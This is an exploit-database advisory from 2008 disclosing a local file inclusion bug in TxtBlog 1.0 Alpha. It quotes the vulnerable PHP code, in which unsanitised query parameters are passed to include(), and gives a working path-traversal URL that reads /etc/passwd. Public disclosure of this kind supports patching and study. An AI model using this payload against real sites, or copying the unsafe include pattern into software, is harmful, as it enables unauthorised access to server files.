exploit-db-mirror/platforms/php/webapps/7241.txt

============================================================
  TxtBlog (index.php m) Local File Inclusion Vulnerability
============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 27 November 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : TxtBlog
 VERSION     : v.1.0 Alpha
 DOWNLOAD    : http://downloads.sourceforge.net/txtblogcms/txtblogcms-1.0a.zip
#####################################################

--- Local File Inclusion ---

-----------------------------
 Vulnerable File (index.php)
-----------------------------

function showMonth() {
	global $config_date_format, $txtblog_body, $txtblog_title, $config_title;

	$txtblog_body = "";
	$txtblog_title = "$config_title - Archives";

	$year = $_GET['y'];			
	$month = $_GET['m'];				

	$files = findFiles("data/$year/$month");	<<< BUG !!!!
	
	if (isset($files)) {
	foreach ($files as $file) {
				
		include ("data/$year/$month/$file");	<<< BUG !!!!
		$date_array = explode(" ",$date);
		$date = date($config_date_format, mktime($date_array[0], $date_array[1], $date_array[2], $date_array[3], $date_array[4], $date_array[5]));
		$txtblog_body .= "<span class='blog_title'>$title</span><br>\n<span class='blog_date'>$date</span><br>\n".bb2html($blog)."<br>\n<hr size='1'>\n";

	}
	}
}

---------
 Exploit
---------

[+] http://[Target]/[txtblogcms_path]/index.php?y=2005&m=01/../../../../../../../../etc/passwd%00


#######################################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################

# milw0rm.com [2008-11-27]